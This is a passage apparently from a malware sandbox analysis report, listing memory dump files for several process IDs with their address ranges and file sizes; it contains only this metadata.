memory/3120-132-0x000000001B2F0000-0x000000001B300000-memory.dmp
Filesize 64KB
-
memory/3120-136-0x000000001B310000-0x000000001B31C000-memory.dmp
Filesize 48KB
-
memory/3120-139-0x000000001BD80000-0x000000001BD8A000-memory.dmp
Filesize 40KB
-
memory/3120-249-0x000000001B290000-0x000000001B2A0000-memory.dmp
Filesize 64KB
-
memory/3120-235-0x00007FFA544D0000-0x00007FFA54F91000-memory.dmp
Filesize 10.8MB
-
memory/3120-142-0x000000001BDB0000-0x000000001BDBC000-memory.dmp
Filesize 48KB
-
memory/3120-143-0x000000001BDC0000-0x000000001BDCC000-memory.dmp
Filesize 48KB
-
memory/3120-141-0x000000001BDA0000-0x000000001BDAE000-memory.dmp
Filesize 56KB
-
memory/3120-140-0x000000001BD90000-0x000000001BD98000-memory.dmp
Filesize 32KB
-
memory/3120-127-0x000000001B230000-0x000000001B238000-memory.dmp
Filesize 32KB
-
memory/3132-419-0x0000000000400000-0x00000000004CE000-memory.dmp
Filesize 824KB
-
memory/3968-746-0x0000000000400000-0x000000000062E000-memory.dmp
Filesize 2.2MB
-
memory/3968-188-0x0000000000400000-0x000000000062E000-memory.dmp
Filesize 2.2MB
-
memory/3968-86-0x0000000000830000-0x0000000000930000-memory.dmp
Filesize 1024KB
-
memory/3968-882-0x0000000000400000-0x000000000062E000-memory.dmp
Filesize 2.2MB
-
memory/3968-894-0x0000000000400000-0x000000000062E000-memory.dmp
Filesize 2.2MB
-
memory/3968-88-0x0000000000400000-0x000000000062E000-memory.dmp
Filesize 2.2MB
-
memory/3968-87-0x0000000000790000-0x00000000007AC000-memory.dmp
Filesize 112KB
-
memory/3968-186-0x0000000000830000-0x0000000000930000-memory.dmp
Filesize 1024KB
-
memory/4408-821-0x0000000002D70000-0x0000000002DDF000-memory.dmp
Filesize 444KB
-
memory/4408-818-0x00000000009F0000-0x0000000000F0C000-memory.dmp
Filesize 5.1MB
-
memory/4408-878-0x0000000002D70000-0x0000000002DDF000-memory.dmp
Filesize 444KB
-
memory/4960-181-0x0000000000400000-0x0000000000483000-memory.dmp
Filesize 524KB
-
memory/4960-175-0x00000000006C0000-0x00000000007C0000-memory.dmp
Filesize 1024KB
-
memory/4960-67-0x00000000006C0000-0x00000000007C0000-memory.dmp
Filesize 1024KB
-
memory/4960-68-0x0000000000650000-0x00000000006B7000-memory.dmp
Filesize 412KB
-
memory/4960-70-0x0000000000400000-0x0000000000483000-memory.dmp
Filesize 524KB
-
memory/5044-252-0x000001A5F7030000-0x000001A5F7052000-memory.dmp
Filesize 136KB
-
memory/5044-251-0x000001A5F74D0000-0x000001A5F74E0000-memory.dmp
Filesize 64KB
-
memory/5044-250-0x00007FFA544D0000-0x00007FFA54F91000-memory.dmp
Filesize 10.8MB
-
memory/5880-741-0x0000000000400000-0x000000000042D000-memory.dmp
Filesize 180KB
-
memory/5900-739-0x0000000000400000-0x000000000042D000-memory.dmp
Filesize 180KB